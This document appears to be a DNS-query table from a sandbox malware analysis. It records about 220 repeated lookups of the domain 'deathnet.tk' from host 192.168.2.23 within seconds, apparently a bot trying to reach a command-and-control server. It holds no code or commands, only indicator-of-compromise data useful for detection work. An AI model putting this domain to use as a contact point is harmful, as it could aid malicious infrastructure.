              Mar 21, 2022 20:07:54.190727949 CET192.168.2.238.8.8.80xedf6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.233442068 CET192.168.2.238.8.8.80x2ab5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.276714087 CET192.168.2.238.8.8.80x7334Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.322211981 CET192.168.2.238.8.8.80x6c5bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.367458105 CET192.168.2.238.8.8.80xef4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.412233114 CET192.168.2.238.8.8.80xafdbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.455995083 CET192.168.2.238.8.8.80x344bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.501255989 CET192.168.2.238.8.8.80x6205Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.549969912 CET192.168.2.238.8.8.80xdeb3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.592892885 CET192.168.2.238.8.8.80x16a8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.638420105 CET192.168.2.238.8.8.80x60b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.681271076 CET192.168.2.238.8.8.80xdc4aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.724020004 CET192.168.2.238.8.8.80xb2d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.769546986 CET192.168.2.238.8.8.80xb2a1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.815994978 CET192.168.2.238.8.8.80xaf6dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.859477043 CET192.168.2.238.8.8.80x4cc5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.903984070 CET192.168.2.238.8.8.80x6145Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.948554039 CET192.168.2.238.8.8.80x767fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.993408918 CET192.168.2.238.8.8.80xdec2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.036114931 CET192.168.2.238.8.8.80xe7d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.080954075 CET192.168.2.238.8.8.80xe971Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.126120090 CET192.168.2.238.8.8.80x46d4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.171284914 CET192.168.2.238.8.8.80x62f5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.218044043 CET192.168.2.238.8.8.80x5d3cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.260365009 CET192.168.2.238.8.8.80x1c75Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.302915096 CET192.168.2.238.8.8.80x7748Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.348261118 CET192.168.2.238.8.8.80xe551Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.393009901 CET192.168.2.238.8.8.80x32faStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.436327934 CET192.168.2.238.8.8.80x98bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.480611086 CET192.168.2.238.8.8.80xf2cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.525356054 CET192.168.2.238.8.8.80x131bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.568615913 CET192.168.2.238.8.8.80xa9ddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.612837076 CET192.168.2.238.8.8.80x4c49Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.656829119 CET192.168.2.238.8.8.80x13a0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.703316927 CET192.168.2.238.8.8.80xb9a9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.749046087 CET192.168.2.238.8.8.80xf9e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.791786909 CET192.168.2.238.8.8.80xf24eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.837574959 CET192.168.2.238.8.8.80x1bc0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.881969929 CET192.168.2.238.8.8.80x5d6fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.927387953 CET192.168.2.238.8.8.80xdb50Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.969608068 CET192.168.2.238.8.8.80xcd98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.014276028 CET192.168.2.238.8.8.80xb1a3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.059176922 CET192.168.2.238.8.8.80xddf0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.102828979 CET192.168.2.238.8.8.80xfe01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.148967028 CET192.168.2.238.8.8.80x3cf7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.194896936 CET192.168.2.238.8.8.80x713bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.238028049 CET192.168.2.238.8.8.80x85f4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.282830954 CET192.168.2.238.8.8.80xbd81Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.327147961 CET192.168.2.238.8.8.80x1b7fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.372574091 CET192.168.2.238.8.8.80xf93eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.418591022 CET192.168.2.238.8.8.80xc3c2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.464940071 CET192.168.2.238.8.8.80x9488Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.509624004 CET192.168.2.238.8.8.80xeb13Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.552063942 CET192.168.2.238.8.8.80xcda3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.597316027 CET192.168.2.238.8.8.80x39d1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.641918898 CET192.168.2.238.8.8.80x57c6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.684863091 CET192.168.2.238.8.8.80xaf53Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.729646921 CET192.168.2.238.8.8.80x532aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.774385929 CET192.168.2.238.8.8.80xc0baStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.820477962 CET192.168.2.238.8.8.80x12a3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.863384962 CET192.168.2.238.8.8.80x4b3aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.908576012 CET192.168.2.238.8.8.80xdaddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.953666925 CET192.168.2.238.8.8.80x7496Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.999984026 CET192.168.2.238.8.8.80x147dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.045900106 CET192.168.2.238.8.8.80x97efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.090640068 CET192.168.2.238.8.8.80x5989Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.139002085 CET192.168.2.238.8.8.80x4931Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.183996916 CET192.168.2.238.8.8.80x5792Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.227323055 CET192.168.2.238.8.8.80xcd6cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.275000095 CET192.168.2.238.8.8.80x5abStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.319169998 CET192.168.2.238.8.8.80x5269Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.361995935 CET192.168.2.238.8.8.80x62e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.407334089 CET192.168.2.238.8.8.80xb762Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.457233906 CET192.168.2.238.8.8.80xdf67Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.502029896 CET192.168.2.238.8.8.80x6895Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.547636986 CET192.168.2.238.8.8.80x1cc4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.596838951 CET192.168.2.238.8.8.80xe558Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.642517090 CET192.168.2.238.8.8.80xc4c3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.688040972 CET192.168.2.238.8.8.80xe392Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.734626055 CET192.168.2.238.8.8.80xc724Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.779371977 CET192.168.2.238.8.8.80xe01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.825611115 CET192.168.2.238.8.8.80x7c2eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.872617006 CET192.168.2.238.8.8.80x78eeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.917102098 CET192.168.2.238.8.8.80xcb7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.961709023 CET192.168.2.238.8.8.80x59f9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.010384083 CET192.168.2.238.8.8.80xb149Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.055048943 CET192.168.2.238.8.8.80xb81cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.107841969 CET192.168.2.238.8.8.80xaef9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.151845932 CET192.168.2.238.8.8.80xde01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.197448015 CET192.168.2.238.8.8.80xf1bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.242763996 CET192.168.2.238.8.8.80x1cdfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.285233974 CET192.168.2.238.8.8.80xaef8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.328404903 CET192.168.2.238.8.8.80x5c7eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.371177912 CET192.168.2.238.8.8.80xa7fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.417433977 CET192.168.2.238.8.8.80x85ccStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.460365057 CET192.168.2.238.8.8.80x30abStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.504993916 CET192.168.2.238.8.8.80xe776Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.551028013 CET192.168.2.238.8.8.80x2e44Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.600112915 CET192.168.2.238.8.8.80xc8eeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.643659115 CET192.168.2.238.8.8.80x9126Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.690790892 CET192.168.2.238.8.8.80xcdf3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.733597994 CET192.168.2.238.8.8.80x8aecStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.780165911 CET192.168.2.238.8.8.80x1fd5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.826582909 CET192.168.2.238.8.8.80xd33fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.875473976 CET192.168.2.238.8.8.80x5338Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.918504000 CET192.168.2.238.8.8.80x9d80Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.961205959 CET192.168.2.238.8.8.80xfc97Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.008313894 CET192.168.2.238.8.8.80xf0bcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.054982901 CET192.168.2.238.8.8.80xb92eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.100440979 CET192.168.2.238.8.8.80x9460Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.143989086 CET192.168.2.238.8.8.80x560dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.189448118 CET192.168.2.238.8.8.80x7d76Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.234673023 CET192.168.2.238.8.8.80xc08aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.279937983 CET192.168.2.238.8.8.80xa66fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.324857950 CET192.168.2.238.8.8.80x51aaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.369981050 CET192.168.2.238.8.8.80xfc7fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.414975882 CET192.168.2.238.8.8.80x898cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.462692022 CET192.168.2.238.8.8.80xa28bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.509634018 CET192.168.2.238.8.8.80x7016Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.555469036 CET192.168.2.238.8.8.80x2c26Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.599082947 CET192.168.2.238.8.8.80x896dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.646714926 CET192.168.2.238.8.8.80x545cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.689464092 CET192.168.2.238.8.8.80x309aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.736375093 CET192.168.2.238.8.8.80xb17fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.781625032 CET192.168.2.238.8.8.80x9791Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.836608887 CET192.168.2.238.8.8.80xd2e8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.880039930 CET192.168.2.238.8.8.80xb411Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.924953938 CET192.168.2.238.8.8.80x2bc0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.970293045 CET192.168.2.238.8.8.80x8d69Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.021456957 CET192.168.2.238.8.8.80x52deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.066689968 CET192.168.2.238.8.8.80x2fe1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.109745026 CET192.168.2.238.8.8.80xa904Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.152968884 CET192.168.2.238.8.8.80x2c99Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.198632002 CET192.168.2.238.8.8.80xfbd0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.243439913 CET192.168.2.238.8.8.80xb1fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.288563013 CET192.168.2.238.8.8.80xd72fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.331499100 CET192.168.2.238.8.8.80xe158Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.376084089 CET192.168.2.238.8.8.80xb5c9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.419302940 CET192.168.2.238.8.8.80x7ddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.464569092 CET192.168.2.238.8.8.80xbcd4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.509852886 CET192.168.2.238.8.8.80x183Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.554826975 CET192.168.2.238.8.8.80x1ee0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.607568026 CET192.168.2.238.8.8.80xd933Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.652398109 CET192.168.2.238.8.8.80x3181Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.697773933 CET192.168.2.238.8.8.80x32ecStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.747466087 CET192.168.2.238.8.8.80x3daeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.793144941 CET192.168.2.238.8.8.80x86a3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.836918116 CET192.168.2.238.8.8.80xf989Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.882325888 CET192.168.2.238.8.8.80x93dbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.925893068 CET192.168.2.238.8.8.80xed04Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.970586061 CET192.168.2.238.8.8.80x36fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.015991926 CET192.168.2.238.8.8.80x92e3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.058969975 CET192.168.2.238.8.8.80x712dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.104957104 CET192.168.2.238.8.8.80x4543Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.150757074 CET192.168.2.238.8.8.80x6d32Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.194439888 CET192.168.2.238.8.8.80x9a0fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.240391970 CET192.168.2.238.8.8.80x8df4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.283170938 CET192.168.2.238.8.8.80x310eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.327824116 CET192.168.2.238.8.8.80x37beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.374588013 CET192.168.2.238.8.8.80x48f2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.420428038 CET192.168.2.238.8.8.80xbfdfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.469521046 CET192.168.2.238.8.8.80x2aefStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.518587112 CET192.168.2.238.8.8.80x4e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.566862106 CET192.168.2.238.8.8.80x26cdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.613487005 CET192.168.2.238.8.8.80xa6cdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.657286882 CET192.168.2.238.8.8.80x3bc0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.701793909 CET192.168.2.238.8.8.80xeaabStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.758611917 CET192.168.2.238.8.8.80x8bafStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.810085058 CET192.168.2.238.8.8.80xa8b0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.862618923 CET192.168.2.238.8.8.80x527eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.905934095 CET192.168.2.238.8.8.80xdf0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.954742908 CET192.168.2.238.8.8.80x25acStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.999205112 CET192.168.2.238.8.8.80xb5f7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.044862032 CET192.168.2.238.8.8.80x7a39Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.091717958 CET192.168.2.238.8.8.80x8c0bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.139102936 CET192.168.2.238.8.8.80xc5b0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.185652018 CET192.168.2.238.8.8.80xfd4dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.233664036 CET192.168.2.238.8.8.80x174aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.278409958 CET192.168.2.238.8.8.80x5045Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.321310043 CET192.168.2.238.8.8.80x6f68Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.368479967 CET192.168.2.238.8.8.80xa9cfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.415410995 CET192.168.2.238.8.8.80x8ffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.461349964 CET192.168.2.238.8.8.80xbf78Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.505672932 CET192.168.2.238.8.8.80x5a00Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.552501917 CET192.168.2.238.8.8.80xed90Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.597337008 CET192.168.2.238.8.8.80xb3bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.643229961 CET192.168.2.238.8.8.80x1951Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.689740896 CET192.168.2.238.8.8.80x470cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.734709978 CET192.168.2.238.8.8.80x6733Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.779941082 CET192.168.2.238.8.8.80xe1faStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.822407961 CET192.168.2.238.8.8.80x9326Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.865201950 CET192.168.2.238.8.8.80x5648Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.909600019 CET192.168.2.238.8.8.80xb6eaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.954349995 CET192.168.2.238.8.8.80x76eeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.004714012 CET192.168.2.238.8.8.80x89c8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.046750069 CET192.168.2.238.8.8.80x778bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.090078115 CET192.168.2.238.8.8.80xf5b3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.132952929 CET192.168.2.238.8.8.80xf812Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.179028034 CET192.168.2.238.8.8.80x333bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.223319054 CET192.168.2.238.8.8.80x9f20Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.268100977 CET192.168.2.238.8.8.80x1209Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.313442945 CET192.168.2.238.8.8.80x4893Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.358127117 CET192.168.2.238.8.8.80x24c1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.401407003 CET192.168.2.238.8.8.80x3ef2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.448164940 CET192.168.2.238.8.8.80xdd01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.491861105 CET192.168.2.238.8.8.80xa9f9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.535234928 CET192.168.2.238.8.8.80x5de3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.580872059 CET192.168.2.238.8.8.80x6561Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.626365900 CET192.168.2.238.8.8.80x297bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.669714928 CET192.168.2.238.8.8.80x632cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.713049889 CET192.168.2.238.8.8.80x636cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.759947062 CET192.168.2.238.8.8.80x44b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.805362940 CET192.168.2.238.8.8.80x17c5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.851634026 CET192.168.2.238.8.8.80xdae0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.896318913 CET192.168.2.238.8.8.80x1ec4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.940860033 CET192.168.2.238.8.8.80x2bb4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.989026070 CET192.168.2.238.8.8.80x6106Standard query (0)deathnet.tkA (IP address)IN (0x0001)
